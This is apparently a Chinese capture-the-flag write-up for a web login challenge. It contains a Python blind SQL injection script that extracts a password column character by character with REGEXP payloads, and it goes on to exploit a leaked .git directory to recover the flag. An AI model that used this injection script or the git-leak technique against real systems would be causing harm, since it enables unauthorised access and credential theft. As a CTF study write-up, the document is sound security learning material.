- 进入页面登陆
- 输入东西都没有
-
直接给burpsuite看看
图片.png
- 有个盲注,此处测试mid left都不行,只有regexp行
- 用脚本进行盲注
# py2.7
import string
import requests
u = 'http://c6065149f0634125968c0ed3421e96e17e45f13aa4af4331.changame.ichunqiu.com/Challenges/login.php'
headers = {
'Content-Type': 'application/x-www-form-urlencoded'
}
payloads = string.letters + string.digits
temp = ''
for i in xrange(32):
for p in payloads:
payload = temp + p
data = "username=aa'or p3ss_w0rd regexp '^{}'%23&password=admin".format(payload)
r = requests.post(u,headers=headers,data=data)
if(len(r.text.encode('utf-8')) == 12):
temp += p
print temp.ljust(32,'.')
break
- p3ss_w0rd是刚开始页面里面源码弄的,什么思路我也不懂。。
- 得到账号是bctf3dm1n,密码是个md5,解密要收费,是adminqwe123666
- 然后登陆进去后给出个目录列表
- 仔细看那个名字.bctfg1t,应该是bctf的git。git泄露哦
- 用githack,不是老版的githack,而是https://github.com/BugScanTeam/GitHack,能找到历史版本
- 运行得到git目录。然后进去git cat-file -p HEAD(历史纪录),例如
git cat -file - p a1/7d89c6219a1bcca6cb3b40526cc5b9da715a6e 去掉/号 - 多试试可以得到一个php目录,然后访问得到flag。
网友评论